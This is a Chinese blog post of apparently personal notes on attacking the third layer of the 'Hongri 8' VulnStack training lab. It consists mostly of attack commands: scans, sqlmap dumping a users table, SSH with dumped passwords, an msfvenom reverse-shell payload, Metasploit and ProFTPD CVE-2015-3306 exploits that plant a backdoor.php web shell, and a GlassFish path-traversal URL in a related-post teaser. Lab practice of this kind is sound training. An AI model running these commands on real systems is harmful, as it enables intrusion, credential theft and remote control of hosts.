红日8实战靶场(第三层总结)

最新推荐文章于 2025-01-13 03:50:01 发布
最新推荐文章于 2025-01-13 03:50:01 发布
阅读量2.3k 收藏 23
点赞数 59
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_62915924/article/details/137176816
版权

第三层

172.16.10.130  +nat 192.168.75.135(这个环境可能是需要这个nat对外网的进行访问)
将172.16.10.130 都换成192.168.75.135

注意这里需要再添加一块网卡因为本身的漏洞利用尝试都成功不了,所以猜测可能是对外的一个转发机器

nmap -T4 -O -sV 172.16.10.130  发现了135,80,8080,3306等端口
172.16.10.130 (里面有网站)
dirsearch -u http://172.16.10.130  -e*   (

http://172.16.10.130/chat/
http://172.16.10.130/drupal/ 
http://172.16.10.130/phpmyadmin/
http://172.16.10.130/uploads/ 
扫描出来的
)

第一种
payroll_app.php  网站可以sqlmap跑一下数据库


 sqlmap -r 66.txt   -dbs
sqlmap -r 66.txt   -D "payroll"  -tables
sqlmap -r 66.txt   -D "payroll"  -T "users" --columns  --batch
sqlmap -r 66.txt   -D "payroll"  -T "users" -C first_name,last_name,password,password,username  --batch -dump    (用usernam跟password登入ssh)

ssh leia_organa@172.16.10.130   (账号leia_organa   密码 help_me_obiwan)
sudo  -i
find / -name "*net*"      (找那个关于payroll这个网站的信息)
cat /var/www/html/payroll_app.php  (发现了phpmyadmin  账号密码 root  sploitme)
(可以生成木马去上传跑)
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.75.131  lport=7777 -f elf > shell4.elf


第二种用刚刚看到的phpmyadmin账号密码
cd /usr/share/exploitdb/exploits/php/webapps   (可以查看phpmyadmin的漏洞)

search phpmyadmin 3.5.8
use 0
set rhosts 172.16.10.130
set password sploitme
run  

第三种(proftpd 1.3.5 命令读写和写入任意文件)
 cd exploit-CVE-2015-3306
python exploit.py --host 172.16.10.130 --port 21 --path "/var/www/html" 
http://172.16.10.130/backdoor.php?cmd=ifconfig(访问这个在cmd=后面加上ifconfig  等命令)

有这个backdoor.php文件


第四种 (这个可能不成功)
用这个http://172.16.10.130/uploads/ 上传
davtest -url http://172.16.10.130/uploads/  -uploadfile demon.php -uploadloc /Parent.php

得这样上传才可以其他的话内容会改变

use exploit/multi/handler

set payload php/meterpreter_reverse_tcp

set LHOST 192.168.75.135

set LPORT 6666
 

whatweb   http://192.168.75.135        (这两个都是扫描cms网站的)
cmseek -v -u http://192.168.137.171

渗透系列:ATT&CK红队评估(红日靶场二)
weixin_54626591的博客
01-22 523
ATT&CK红队评估(红日靶场二)
红日8 靶场实战 (一共九台)
weixin_62915924的博客
03-21 2091
https://192.168.75.135:4848/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afglassfish/glassfish4/glassfish/domains/domain1/config/admin-keyfile (里面有那个平台的账号密码)模块通过 JMX 服务的远程连接指示靶机下载并执行这个恶意代码。
ATT&CK实战系列-红队实战()vulnstack 红日靶场
weixin_68652890的博客
05-20 1917
文章目录信息搜集主机发现端口扫描目录扫描getshell用sql向日志文件写后门getshell网站后台getshell内网信息搜集域信息搜集探测内网存活主机和端口提升权限msf会话移交cscs提权横向移动密码收集psexec横向 信息搜集 主机发现 nmap 192.168.5.0/24 端口扫描 nmap 192.168.5.174 开放3306、80端口 目录扫描 python3 dirmap.py -i http:// 192.168.5.174 -lcf 其它方法 dirsearch -u h
玩转红日-VulnStack靶场-ATT&CK(八)
A_991128a的博客
08-28 1703
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
红日-VulnStack靶场-ATT&CK(二)
braty_的博客
10-01 1264
红日二,cs横向移动
红日8 实战篇章(第二层)
weixin_62915924的博客
03-24 2512
这个是第一层的第一台ip为一个nat网卡同网段加上与第二层连接的ip我的是192.168.75.135 +192.168.3.0/24(属于192.168.3.0/24网段的ip)这个是第二层的(一共五台)这个五台分为四部分虽然是四部分但是都是属于 192.168.3.0/24(网段)账号密码都在那个虚拟机的进入界面第一部分的 192.168.3.77+192.168.3.76第二部分的 192.168.3.75第三部分的 192.168.3.144。
红日8第四层(两台)
weixin_62915924的博客
04-05 812
第三层过来时记得加上网段然后就可以用nmap扫描发现了 135,445,139等端口,漏洞扫描发现了ms17_010用模块扫描一下发现了真的有ms17_010use 0 到use 1 都不行(怀疑有那个防火墙)use 2可以执行 命令执行set command net user (尝试一下看用户)runset command net user zgx620 zgx@620 /add (添加用户)run。
渗透测试-红日靶场
konglong12311的博客
05-22 2006
小编的文章仅学习使用,同时记录小编的学习笔记;如有错漏恳请大神指点,如遇问题可在评论区交流;切勿用于非法行为。
红队攻防知识分享-红日安全团队靶场1
beirry的博客
03-23 9355
环境搭建 靶场链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 环境拓扑图: 以下是虚拟机网络配置 虚拟机 网络配置 Windows7 x64 VMnet1:192.168.52.128;VMnet2:192.168.54.128 Win2k3 Measploitable VMnet1:192.168.52.141 Windows Server 2008 R2 x64 VMnet1:192.168.52.138 kali V
极品靶场,多种玩法【实战红日靶场七:内网综合渗透
Eason_LYC安全白帽子的成长博客
10-19 1218
收集十多篇该靶场文章,结合自己通关笔记,形成的一份集大成靶场wp
红日靶场搭建&渗透
最新发布
cyy001128的博客
01-13 1530
不知道为什么打不开,换了好几个浏览器,换连热点,都不行,就找了个百度网盘的,有相同情况的可以用下面这个提取码:h1e5三台靶机的初始密码都是hongrisec@2019 ,初次登录需要改密码。这里之前就配置过win7,用自己的就可以了win7是一个边界服务器,所以是需要有两个网卡的,首先给win7添加一个网卡,在虚拟机设置中选择添加然后上图操作就可以了将win7的网络适配器1设置成自定义Vmnet2,网络适配器2设置成NAT模式在cmd中用ipconfig查看攻击机IP地址。
vultarget-a红日靶场全面解析(完整版)
问彡心的博客
11-02 1万+
这是一次完全的渗透过程,从对外开放的主机开放的通达OA系统漏洞和永恒之蓝漏洞进入第一层主机,并利用其作为跳板机,渗透第二层存在有redis未授权访问的漏洞,在根据添加路由和代理的方式成功拿到最高权限的shell,最终攻击到域控,从web渗透,到横向渗透最后到掌握域控,中间出现过很多的问题,比如通道死机,无法连接,木马程序停止在目标机运行等状况
红日安全-ATT& CK实战:Vulnstack靶场实战
求学者的博客
10-28 2293
安全提示:该篇内容仅可用于学习环境配置下载靶场;网卡配置;检测联通性;开启web服务。信息收集使用Nmap扫描;使用kali Linux访问目标80端口;使用御剑后台扫描工具扫描。漏洞利用yxcms漏洞(信息泄露后台弱密码);phpadmin弱口令漏洞;yxcms的留言板存在存储型xss漏洞;yxcms后台存在任意文件读写漏洞;开启全局日志getshell;反弹shellMSF监听;MSF提权;使用;系统信息收集;1主机密码收集;1CS。
红日安全ATT&CK靶机实战系列之vulnstack1
黑白的博客
04-13 8755
声明 好好学习,天天向上 环境配置 下载地址,直接进去用百度云,没有会员也下的非常快 http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 边下载着,可以开始vmware的网络配置 下图为官方给出的,从虚拟机网络来看 攻击者:kali+windows的攻击机 VM1:对外边界服务器,win7 VM2:域成员,2003 VM3:域控,2008 所以这中间出现两个网段,一个外网网段,一个内网网段 鉴于需要两个网段,我们需要在vmware上做一些配置 首先,用一
红日靶场(vulnstack)一 超全面详细的渗透测试学习笔记
热门推荐
qq_41821603的博客
11-24 5万+
这里写目录标题一、环境搭建二、拿下web服务器2.1 信息收集 一、环境搭建 实验环境拓扑如下: windows2008 域控 (host-only) windiws 7 web服务器 (双网卡 host-only + NAT) windows 2003 域内PC (host-only) 二、拿下web服务器 2.1 信息收集 ...
红日安全-VulnStack】ATT_CK实战系列——红队实战()
st3pby的博客
11-15 1687
红日安全-VulnStack】ATT_CK实战系列——红队实战()
红日靶机vulnstack07【半总结】
qq_45300786的博客
10-12 590
web1是nginx代理服务器,真正的服务器是web2 web1监听本地81端口,然后转发到web2的8000端口。(要不是靶场,还真不清楚咋回事) 参考: 红日安全ATT&CK靶机实战系列之vulnstack7 自主搭建的三层网络域渗透靶场打靶记录 内网攻防-红日靶机7 ...
Vulhub-DC-8靶场实战攻略
weixin_51339377的博客
03-17 1036
测试网页中的Details 发现可以通过Get传参数 加上单引号以后出现报错 说明存在SQL注入的漏洞 通过sqlmap进行尝试 sqlmap -uhttp://192.168.206.142/?nid=1 -D d7db --tables sqlmap -u http://192.168.206.142/?nid=1 -D d7db -T users --columns sqlmap -u http://192.168.206.142...
【内网星球3.0】红队之靶场集中营(聊聊都是哪60个靶场
Ms08067安全实验室
12-12 1735
2019年11月我们选择了知识星球,星球给我们带来了第一批忠实的粉丝,也带来了很多快乐的时光,今年因为主要精力放在培训上面,而忽略了星球,这也让很多星友很是失望,不过我们不会放弃星球。目前星球大概可以分为二种:一种是星主分享的资源多,不管是哪个安全方向的。说实话,在如今这个互联网时代,只要不是你亲自撰写录制的,而是从网上收集的。只要你用心去搜索、整理,相信这些资料你都可以从各个方面找到。再者你保存...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值